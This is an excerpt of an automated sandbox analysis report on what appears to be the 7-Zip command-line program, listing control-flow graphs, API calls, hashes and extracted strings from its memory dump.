                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: AttributesFilefree
                                                                • String ID:
                                                                • API String ID: 1936811914-0
                                                                • Opcode ID: 2b197326d930c81739ce0310d85795b3f658fd51b37e5abb9d2da20ad921631d
                                                                • Instruction ID: fca546554f7ad1894fd352af642a141b49cbdf9c3f1c54714a91a4a7bd366657
                                                                • Opcode Fuzzy Hash: 2b197326d930c81739ce0310d85795b3f658fd51b37e5abb9d2da20ad921631d
                                                                • Instruction Fuzzy Hash: F181682221C54192CA28EF21E4516EEA731FBD6744F441132FB9E87BA9DF38C9C6D700

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2843 117ebc-117ee3 call 119b68 2846 117ee9-117f26 call 11339c call 119ce4 2843->2846 2847 117fca-117fd6 call 119ddc 2843->2847 2859 117f28-117f2c 2846->2859 2860 117f8c-117fa4 call 1191dc 2846->2860 2853 118253-11828a call 119d0c call 119b30 2847->2853 2854 117fdc-117fe4 2847->2854 2873 118306-11830b 2853->2873 2874 11828c-118294 2853->2874 2854->2853 2857 117fea-11800c call 113274 * 2 2854->2857 2876 11801b-118020 2857->2876 2877 11800e-118017 2857->2877 2859->2860 2864 117f2e-117f77 call 11abb0 2859->2864 2871 117fa6 2860->2871 2872 117fa8-117fac 2860->2872 2864->2860 2884 117f79-117f87 2864->2884 2878 117fb9-117fc5 call 1189d8 2871->2878 2879 117fb6 2872->2879 2880 117fae-117fb3 2872->2880 2881 118318-11831c 2873->2881 2882 11830d-118312 2873->2882 2874->2873 2883 118296-1182a5 call 117d4c 2874->2883 2885 118040-11804c call 113670 2876->2885 2886 118022-11803e call 112880 2876->2886 2877->2876 2892 118519-118524 2878->2892 2879->2878 2880->2879 2889 118377-118381 call 119c80 2881->2889 2890 11831e-118330 call 117d4c 2881->2890 2882->2881 2888 1184f2-118500 call 117978 2882->2888 2883->2888 2905 1182ab-1182b2 2883->2905 2884->2892 2902 118051-118062 call 119ce4 2885->2902 2886->2885 2886->2902 2900 118505-118506 2888->2900 2889->2888 2906 118387-118396 2889->2906 2890->2888 2910 118336-11833d 2890->2910 2908 118509-118511 call 11794c 2900->2908 2919 1180b1-1180bb call 117ebc 2902->2919 2920 118064-118067 2902->2920 2905->2888 2907 1182b8-1182eb call 11339c 2905->2907 2906->2888 2911 11839c-1183a6 call 119ab0 2906->2911 2922 1182ed-1182f8 2907->2922 2923 1182fc-118301 2907->2923 2918 118516 2908->2918 2910->2888 2915 118343-118372 2910->2915 2911->2888 2929 1183ac-1183c2 call 113274 2911->2929 2915->2908 2918->2892 2927 1180c1-118108 call 113314 call 113208 call 117ce0 2919->2927 2934 11823e-11824e free * 2 2919->2934 2925 118075-1180a3 2920->2925 2926 118069-11806c 2920->2926 2922->2923 2923->2908 2925->2927 2928 1180a5-1180af call 113404 2925->2928 2926->2919 2931 11806e-118073 2926->2931 2955 11815a-118185 free * 2 call 11794c free 2927->2955 2956 11810a-118111 2927->2956 2928->2927 2939 1183d2-1183f2 2929->2939 2940 1183c4-1183ce call 112fec 2929->2940 2931->2919 2931->2925 2934->2853 2944 118402-118437 call 117978 2939->2944 2945 1183f4-1183fe call 112fec 2939->2945 2940->2939 2953 118484-11849d call 117d4c 2944->2953 2954 118439-118457 wcscmp 2944->2954 2945->2944 2970 1184b3-1184f0 call 11339c free 2953->2970 2971 11849f-1184a1 2953->2971 2957 118459-118477 call 11339c free 2954->2957 2958 11847c 2954->2958 2972 11822d-118239 free 2955->2972 2961 118113-118124 call 112748 2956->2961 2962 11818a-1181c1 SetLastError free * 2 call 11794c free 2956->2962 2957->2908 2958->2953 2974 1181c3-1181ca 2961->2974 2975 11812a-118158 free call 113208 call 117ce0 2961->2975 2962->2972 2970->2908 2976 1184a3-1184a5 2971->2976 2977 1184a7-1184b1 free 2971->2977 2972->2892 2980 1181e0-11822a call 11362c free * 2 call 11794c free 2974->2980 2981 1181cc-1181d1 2974->2981 2975->2955 2975->2956 2976->2970 2976->2977 2977->2888 2980->2972 2981->2980 2985 1181d3-1181dc 2981->2985 2985->2980
                                                                APIs
                                                                • free.MSVCRT ref: 0011812F
                                                                • free.MSVCRT ref: 0011816A
                                                                • free.MSVCRT ref: 0011817F
                                                                • free.MSVCRT ref: 00118232
                                                                  • Part of subcall function 0011ABB0: GetModuleHandleW.KERNEL32 ref: 0011ABD1
                                                                  • Part of subcall function 0011ABB0: GetProcAddress.KERNEL32 ref: 0011ABE1
                                                                  • Part of subcall function 0011ABB0: GetDiskFreeSpaceW.KERNEL32 ref: 0011AC32
                                                                • SetLastError.KERNEL32 ref: 0011818F
                                                                • free.MSVCRT ref: 0011819B
                                                                • free.MSVCRT ref: 001181A6
                                                                • free.MSVCRT ref: 001181BB
                                                                • free.MSVCRT ref: 00118243
                                                                • free.MSVCRT ref: 0011824E
                                                                • free.MSVCRT ref: 0011815F
                                                                  • Part of subcall function 0011339C: free.MSVCRT ref: 001133D7
                                                                  • Part of subcall function 0011339C: memmove.MSVCRT(00000000,?,?,00000000,001110A8), ref: 001133F2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$AddressDiskErrorFreeHandleLastModuleProcSpacememmove
                                                                • String ID: :$:$DATA$\
                                                                • API String ID: 4130059181-1004618218
                                                                • Opcode ID: 7d47eded2622c94f0ddccb54c994b41fb8cf36bc1bcc716852e6415c4a0d71d6
                                                                • Instruction ID: 6d9cd8634c4de0f19fb758c00b7895ed19a89ccc72659395b037732aaf5dd937
                                                                • Opcode Fuzzy Hash: 7d47eded2622c94f0ddccb54c994b41fb8cf36bc1bcc716852e6415c4a0d71d6
                                                                • Instruction Fuzzy Hash: 55027E3250968096CB28DF29D4902DEB770F7A5750F40823AE79E47B68DF34C5E6CB44

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 2991 153e84-153eb5 2992 1541e8 2991->2992 2993 153ebb 2991->2993 2995 1541ea-1541fd 2992->2995 2994 153ebe-153efa fputs call 152e24 2993->2994 2998 153f51-153f59 2994->2998 2999 153efc-153f03 2994->2999 3000 153f64-153f6f 2998->3000 3001 153f5b-153f62 2998->3001 3002 153f05-153f1d fputs call 112300 2999->3002 3003 153f1f-153f4c call 113274 call 1530cc free 2999->3003 3005 153f73-153f9e call 152e24 call 153148 3000->3005 3001->3005 3002->2998 3003->2998 3015 153fa0-153fce fputs * 2 call 112640 call 112300 3005->3015 3016 153fd3-153fe3 call 153034 3005->3016 3015->3016 3019 153fe8-153fea 3016->3019 3019->2995 3021 153ff0-153ff7 3019->3021 3023 15402c-15403c 3021->3023 3024 153ff9-154027 fputs * 2 call 1126a0 call 112300 3021->3024 3023->2995 3029 154042-154048 3023->3029 3024->3023 3030 1540af-1540b9 3029->3030 3031 15404a-154079 3029->3031 3032 15419d-1541b1 3030->3032 3033 1540bf-1540e0 fputs 3030->3033 3037 15407f-154096 call 153034 3031->3037 3038 1541b9 3031->3038 3032->2994 3034 1541b7 3032->3034 3033->3032 3041 1540e6-1540fc 3033->3041 3034->2992 3044 15409c-1540ad SysFreeString 3037->3044 3045 1541bb 3037->3045 3040 1541bd-1541ca SysFreeString 3038->3040 3040->2995 3041->3032 3043 154102-154133 3041->3043 3047 1541cc 3043->3047 3048 154139-154162 3043->3048 3044->3030 3044->3031 3045->3040 3049 1541d9-1541e6 SysFreeString 3047->3049 3051 154164-154197 call 152ecc call 11ae2c SysFreeString 3048->3051 3052 1541ce-1541d8 call 11ae2c 3048->3052 3049->2995 3051->3032 3051->3043 3052->3049
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: fputs$FreeString$fputcfree
                                                                • String ID: = $--$----$Path$Type$Warning: The archive is open with offset
                                                                • API String ID: 2701146716-1919703766
                                                                • Opcode ID: 0d94f0344947542c072f3f7d1a6acdb2a7a7600c81a17a110e60a59a3ca316a5
                                                                • Instruction ID: 22bd2e32b5c5f134e0747b2784f904a19b73b8151cc98ae64e74cc88c78e99ad
                                                                • Opcode Fuzzy Hash: 0d94f0344947542c072f3f7d1a6acdb2a7a7600c81a17a110e60a59a3ca316a5
                                                                • Instruction Fuzzy Hash: CE918C36214E85D2DB14DF22E9947AE7331F795BCAF005122EE6A4B728DF38D999C700

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 3059 11f71c-11f74e call 111610 3062 11f750-11f773 call 1302a0 _CxxThrowException 3059->3062 3063 11f774-11f7c2 _isatty * 3 3059->3063 3062->3063 3065 11f7d4 3063->3065 3066 11f7c4-11f7c8 3063->3066 3069 11f7d9-11f81c 3065->3069 3066->3065 3068 11f7ca-11f7ce 3066->3068 3068->3065 3070 11f7d0-11f7d2 3068->3070 3071 11f82a 3069->3071 3072 11f81e-11f822 3069->3072 3070->3069 3074 11f830-11f834 3071->3074 3072->3071 3073 11f824-11f828 3072->3073 3073->3071 3073->3074 3075 11f836 3074->3075 3076 11f83c-11f846 3074->3076 3075->3076 3077 11f854-11f85e 3076->3077 3078 11f848-11f84e 3076->3078 3079 11f860-11f866 3077->3079 3080 11f86c-11f876 3077->3080 3078->3077 3079->3080 3081 11f884-11f88e 3080->3081 3082 11f878-11f87e 3080->3082 3083 11f890-11f89d 3081->3083 3084 11f8f3-11f8fd 3081->3084 3082->3081 3085 11f8ab-11f8be call 11ed34 3083->3085 3086 11f89f-11f8a9 3083->3086 3087 11f91a-11f931 call 11ac74 * 2 3084->3087 3088 11f8ff-11f917 3084->3088 3094 11f8c0-11f8e5 call 1302a0 _CxxThrowException 3085->3094 3095 11f8e6-11f8ed 3085->3095 3086->3084 3096 11f936-11f940 3087->3096 3088->3087 3094->3095 3095->3084 3098 11f946-11f95c 3096->3098 3099 11f9dd-11f9e7 3096->3099 3101 11f965-11f977 wcscmp 3098->3101 3102 11f95e-11f963 3098->3102 3103 11fa94-11fa9c 3099->3103 3104 11f9ed-11f9fa 3099->3104 3105 11f9bb-11f9c2 call 11ad0c 3101->3105 3106 11f979-11f98c call 11ed34 3101->3106 3102->3105 3104->3103 3107 11fa00-11fa1c call 112bc8 call 112d34 3104->3107 3105->3099 3114 11f9c4-11f9d7 call 15d4c0 call 11ac74 3105->3114 3115 11f9b4 3106->3115 3116 11f98e-11f9b3 call 1302a0 _CxxThrowException 3106->3116 3123 11fa4f-11fa74 call 1302a0 _CxxThrowException 3107->3123 3124 11fa1e-11fa3b call 113f78 3107->3124 3114->3099 3115->3105 3116->3115 3133 11fa75-11fa8f GetCurrentProcess SetProcessAffinityMask free 3123->3133 3131 11fa49-11fa4d 3124->3131 3132 11fa3d-11fa46 3124->3132 3131->3123 3131->3133 3132->3131 3133->3103
                                                                APIs
                                                                Strings
                                                                • SeLockMemoryPrivilege, xrefs: 0011F9CB
                                                                • Unsupported switch postfix -bb, xrefs: 0011F8C3
                                                                • Unsupported switch postfix for -slp, xrefs: 0011F991
                                                                • SeRestorePrivilege, xrefs: 0011F91C
                                                                • Unsupported switch postfix -stm, xrefs: 0011FA52
                                                                • SeCreateSymbolicLinkPrivilege, xrefs: 0011F92A
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: ExceptionThrowfree$_isatty$Process$AffinityCurrentMaskwcscmp
                                                                • String ID: SeCreateSymbolicLinkPrivilege$SeLockMemoryPrivilege$SeRestorePrivilege$Unsupported switch postfix -bb$Unsupported switch postfix -stm$Unsupported switch postfix for -slp
                                                                • API String ID: 1961088698-2328792591
                                                                • Opcode ID: c2f4b7cbffa4da8aa62650c82c274732c1406b7f11731e234dbbf7887eb3a42e
                                                                • Instruction ID: 33ca19c13845c5f3421bbcd982694155bf738ee65ea9e462584a8ecb234f23fe
                                                                • Opcode Fuzzy Hash: c2f4b7cbffa4da8aa62650c82c274732c1406b7f11731e234dbbf7887eb3a42e
                                                                • Instruction Fuzzy Hash: 14A18C73608AC4D9EB25DF25E4903ED7B60E795B94F98807ADB8C47765CF28C986C700

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 3134 15a448-15a455 3135 15a457-15a45f 3134->3135 3136 15a49c-15a4a4 3134->3136 3135->3136 3139 15a461-15a495 call 112300 fputs call 1126a0 call 112300 3135->3139 3137 15a4f4 3136->3137 3138 15a4a6-15a4a9 3136->3138 3142 15a4fc-15a50a 3137->3142 3140 15a4df-15a4e5 3138->3140 3141 15a4ab-15a4da call 112300 fputs call 1126a0 call 112300 3138->3141 3139->3136 3140->3142 3141->3140 3144 15a53d-15a559 free 3142->3144 3145 15a50c 3142->3145 3150 15a58c-15a5b5 free 3144->3150 3151 15a55b 3144->3151 3148 15a510-15a526 3145->3148 3153 15a538-15a53b 3148->3153 3154 15a528-15a533 free * 2 3148->3154 3162 15a5c5-15a5c8 3150->3162 3163 15a5b7-15a5be 3150->3163 3156 15a55f-15a575 3151->3156 3153->3144 3153->3148 3154->3153 3160 15a587-15a58a 3156->3160 3161 15a577-15a582 free * 2 3156->3161 3160->3150 3160->3156 3161->3160 3168 15a5e7-15a603 free 3162->3168 3169 15a5ca-15a5e6 _CxxThrowException 3162->3169 3163->3162 3166 15a5c0 3163->3166 3172 15a5c0 call 1566a8 3166->3172 3170 15a605 3168->3170 3171 15a626-15a637 free call 13a13c 3168->3171 3169->3168 3173 15a609-15a624 free 3170->3173 3175 15a63c-15a675 call 157080 call 11182c call 157f50 3171->3175 3172->3162 3173->3171 3173->3173 3182 15a677 3175->3182 3183 15a6a8-15a6c9 free 3175->3183 3185 15a67b-15a691 3182->3185 3186 15a6a3-15a6a6 3185->3186 3187 15a693-15a69e free * 2 3185->3187 3186->3183 3186->3185 3187->3186
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$fputs$ExceptionThrowfputc
                                                                • String ID: Errors: $Warnings:
                                                                • API String ID: 437615013-2345102087
                                                                • Opcode ID: 40a164d8ef110d7c6f53597072ad901ddf4be2da223ed109514b88298d34997d
                                                                • Instruction ID: f33c639eeb08bd3557b34384c69ab894902ceadd14d5739630a28ec91020cd30
                                                                • Opcode Fuzzy Hash: 40a164d8ef110d7c6f53597072ad901ddf4be2da223ed109514b88298d34997d
                                                                • Instruction Fuzzy Hash: BA5196623645C0C1C934EB25E9913EDA361FB92791F884322DEAD1B759DF38C4DAC741

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 3188 1383c8-13841d call 116570 call 1131c0 call 118624 3195 138482 3188->3195 3196 13841f-13844c call 1131c0 call 1186dc 3188->3196 3197 138485-138489 3195->3197 3196->3195 3210 13844e-13847b call 1131c0 call 1186dc 3196->3210 3199 13848b-138498 free 3197->3199 3200 138499-13849d 3197->3200 3199->3200 3202 13849f-1384ac free 3200->3202 3203 1384ad-1384b1 3200->3203 3202->3203 3205 1384b3-1384b8 free 3203->3205 3206 1384bd-1384c0 3203->3206 3205->3206 3208 1384c6-1384ee call 113208 call 138290 3206->3208 3209 1385ef-138607 call 113314 free 3206->3209 3222 1384f0-138516 call 113314 free * 2 3208->3222 3223 13851b-138538 call 138290 3208->3223 3217 13860a-138611 3209->3217 3210->3195 3224 13847d-138480 3210->3224 3222->3217 3229 138565-13857b call 138290 3223->3229 3230 13853a-138560 call 113314 free * 2 3223->3230 3224->3197 3235 1385a5-1385bb call 138290 3229->3235 3236 13857d-1385a3 call 113314 free * 2 3229->3236 3230->3217 3241 1385e5-1385ea free 3235->3241 3242 1385bd-1385e3 call 113314 free * 2 3235->3242 3236->3217 3241->3209 3242->3217
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$memmove
                                                                • String ID: 7z.dll$Codecs$Formats$Path$Path64
                                                                • API String ID: 1534225298-3804457719
                                                                • Opcode ID: 83274c2b3d544992283108eb9c5b7aa940d95cecb85798d2266b0b7fa0fa9ebc
                                                                • Instruction ID: f18409108e61e6c053b9858a75b45167d115000fe16667483cf344aa80c4a7d9
                                                                • Opcode Fuzzy Hash: 83274c2b3d544992283108eb9c5b7aa940d95cecb85798d2266b0b7fa0fa9ebc
                                                                • Instruction Fuzzy Hash: 8F51A362204A0590DE24EF25E8513EA6720E7D27E4F581222FA5E577B9CF38C6CAC704

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 3245 13ab74-13aba4 3246 13abd3-13abf5 3245->3246 3247 13aba6 3245->3247 3248 13ae31-13ae78 call 1383c8 call 1131c0 call 13a7fc free 3246->3248 3249 13abfb 3246->3249 3250 13abaa-13abbc 3247->3250 3268 13ae7a 3248->3268 3269 13ae7f-13ae87 3248->3269 3251 13ac02-13acba call 113208 call 113518 call 113208 * 2 3249->3251 3253 13abce-13abd1 3250->3253 3254 13abbe-13abc9 call 1394a8 free 3250->3254 3278 13acc6-13accd 3251->3278 3279 13acbc-13acc1 call 113518 3251->3279 3253->3246 3253->3250 3254->3253 3271 13af7a-13af99 free 3268->3271 3272 13ae99-13aeca call 1131c0 call 13a9fc free 3269->3272 3273 13ae89-13ae94 call 11339c 3269->3273 3288 13aed1-13aeee call 1131c0 call 13a9fc 3272->3288 3289 13aecc 3272->3289 3273->3272 3282 13acd9-13ad35 call 139d98 free * 2 3278->3282 3283 13accf-13acd4 call 113518 3278->3283 3279->3278 3290 13ad51-13ad61 call 112130 3282->3290 3291 13ad37-13ad4c call 13a034 3282->3291 3283->3282 3302 13aef3-13af02 free 3288->3302 3289->3271 3300 13ad63-13ad6a 3290->3300 3301 13ad6c 3290->3301 3299 13addd-13adf2 call 112130 3291->3299 3311 13ae03 3299->3311 3312 13adf4-13ae01 call 139af0 3299->3312 3304 13ad6f-13ad8b call 11b8f0 3300->3304 3301->3304 3305 13af06-13af10 3302->3305 3306 13af04 3302->3306 3321 13adbd-13adc0 3304->3321 3322 13ad8d-13ad93 3304->3322 3309 13af12-13af16 3305->3309 3310 13af18-13af1b 3305->3310 3306->3271 3314 13af2a-13af2e 3309->3314 3310->3314 3315 13af1d-13af24 3310->3315 3316 13ae06-13ae2b call 11b8f0 call 1394a8 3311->3316 3312->3316 3318 13af30-13af36 3314->3318 3319 13af77 3314->3319 3315->3314 3317 13af26 3315->3317 3316->3248 3316->3251 3317->3314 3318->3319 3326 13af38 3318->3326 3319->3271 3327 13adc2-13add3 memmove 3321->3327 3328 13adda 3321->3328 3323 13ada1-13adac 3322->3323 3324 13ad95-13ad9a free 3322->3324 3330 13add5-13add8 3323->3330 3331 13adae-13adb9 call 112130 3323->3331 3324->3323 3333 13af3b-13af5a GetProcAddress 3326->3333 3327->3299 3328->3299 3330->3299 3331->3321 3336 13af66-13af6f 3333->3336 3337 13af5c-13af64 3333->3337 3336->3333 3340 13af71 3336->3340 3337->3336 3342 13af73-13af75 3337->3342 3340->3319 3342->3271
                                                                APIs
                                                                • free.MSVCRT ref: 0013ABC9
                                                                • free.MSVCRT ref: 0013ACF3
                                                                • free.MSVCRT ref: 0013ACFE
                                                                • free.MSVCRT ref: 0013AD95
                                                                • memmove.MSVCRT(?), ref: 0013ADCB
                                                                • free.MSVCRT ref: 0013AE70
                                                                • free.MSVCRT ref: 0013AF7F
                                                                  • Part of subcall function 001394A8: free.MSVCRT ref: 001394DB
                                                                  • Part of subcall function 001394A8: free.MSVCRT ref: 001394E3
                                                                  • Part of subcall function 001394A8: free.MSVCRT ref: 001394F0
                                                                  • Part of subcall function 001394A8: free.MSVCRT ref: 0013951C
                                                                  • Part of subcall function 001394A8: free.MSVCRT ref: 00139525
                                                                  • Part of subcall function 001394A8: free.MSVCRT ref: 0013952D
                                                                  • Part of subcall function 001394A8: free.MSVCRT ref: 0013953A
                                                                • free.MSVCRT ref: 0013AEC2
                                                                  • Part of subcall function 0011339C: free.MSVCRT ref: 001133D7
                                                                  • Part of subcall function 0011339C: memmove.MSVCRT(00000000,?,?,00000000,001110A8), ref: 001133F2
                                                                  • Part of subcall function 0013A9FC: free.MSVCRT ref: 0013AA95
                                                                  • Part of subcall function 0013A9FC: free.MSVCRT ref: 0013AAC5
                                                                  • Part of subcall function 0013A9FC: free.MSVCRT ref: 0013AAD2
                                                                • free.MSVCRT ref: 0013AEFA
                                                                • GetProcAddress.KERNEL32 ref: 0013AF4D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$memmove$AddressProc
                                                                • String ID: 7z.dll$Codecs\$Formats\$SetCodecs
                                                                • API String ID: 4053071709-2499791885
                                                                • Opcode ID: c5c5cebdfb8b1fe3bc9f48e8b3820ba4ea19430a76db094a28c5f74b8e2b3a45
                                                                • Instruction ID: 8f155fe7bfe422cc6e121be6521a1cd781d96f0acd46d97aebca53960ff1e94e
                                                                • Opcode Fuzzy Hash: c5c5cebdfb8b1fe3bc9f48e8b3820ba4ea19430a76db094a28c5f74b8e2b3a45
                                                                • Instruction Fuzzy Hash: 53B1D376204AC092CB20EB21E4903AFB760F795788F844215EBCE47B29CF7DC5A9C701

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 3343 151850-151886 EnterCriticalSection 3344 1518b1-1518bb 3343->3344 3345 151888-15188e call 15b1c8 3343->3345 3347 1518c2-1518c4 3344->3347 3348 1518bd call 1122e4 3344->3348 3351 151893-1518ac 3345->3351 3349 151991-15199e 3347->3349 3350 1518ca-1518d2 3347->3350 3348->3347 3355 1519a4-1519a7 3349->3355 3356 151a4e-151a57 LeaveCriticalSection 3349->3356 3353 1518d4-1518da 3350->3353 3354 15191a-15192b 3350->3354 3351->3344 3353->3354 3357 1518dc-1518e2 3353->3357 3360 15192d-15193a call 112300 3354->3360 3361 15196a-151974 3354->3361 3355->3356 3358 1519ad-1519b7 3355->3358 3359 151a59-151a62 3356->3359 3364 1518e4-1518eb 3357->3364 3365 1518ed 3357->3365 3362 151a31-151a4c LeaveCriticalSection 3358->3362 3366 1519b9-1519d7 call 112300 fputs 3358->3366 3360->3361 3375 15193c-151965 fputs call 1126a0 call 112300 3360->3375 3361->3362 3363 15197a-151981 3361->3363 3362->3359 3363->3362 3368 151987-15198c call 1122e4 3363->3368 3369 1518f4-1518fe 3364->3369 3365->3369 3378 1519f2-151a14 call 116618 call 112320 free 3366->3378 3379 1519d9-1519f0 fputs 3366->3379 3368->3362 3369->3361 3373 151900-151913 fputs call 112300 3369->3373 3382 151918 3373->3382 3375->3361 3383 151a19-151a2c call 112300 call 1122e4 3378->3383 3379->3383 3382->3361 3383->3362
                                                                APIs
                                                                • EnterCriticalSection.KERNEL32 ref: 00151877
                                                                • fputs.MSVCRT ref: 0015190A
                                                                • LeaveCriticalSection.KERNEL32 ref: 00151A44
                                                                  • Part of subcall function 0015B1C8: memset.MSVCRT ref: 0015B20D
                                                                  • Part of subcall function 0015B1C8: fputs.MSVCRT ref: 0015B232
                                                                • fputs.MSVCRT ref: 0015194D
                                                                  • Part of subcall function 001126A0: fputs.MSVCRT ref: 001126C1
                                                                • fputs.MSVCRT ref: 001519CB
                                                                • fputs.MSVCRT ref: 001519EA
                                                                • LeaveCriticalSection.KERNEL32 ref: 00151A51
                                                                  • Part of subcall function 00112300: fputc.MSVCRT ref: 00112311
                                                                • free.MSVCRT ref: 00151A14
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: fputs$CriticalSection$Leave$Enterfputcfreememset
                                                                • String ID: Can't allocate required memory!$ERROR: $Everything is Ok$Sub items Errors: $p
                                                                • API String ID: 676172275-580504279
                                                                • Opcode ID: 00b0e537d4ffefddec52b66757bd7e4d904c0f2f8dd17a6a25b95f70ab0f44f6
                                                                • Instruction ID: 5c1089be2d80501a3778add70ab60483154fe739441e0fce18af331197c7f53b
                                                                • Opcode Fuzzy Hash: 00b0e537d4ffefddec52b66757bd7e4d904c0f2f8dd17a6a25b95f70ab0f44f6
                                                                • Instruction Fuzzy Hash: B7516F72345A81E2EB2E9F25D9A03ED6320F794B95F544126DF3E0B651CF78D4A9C300

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
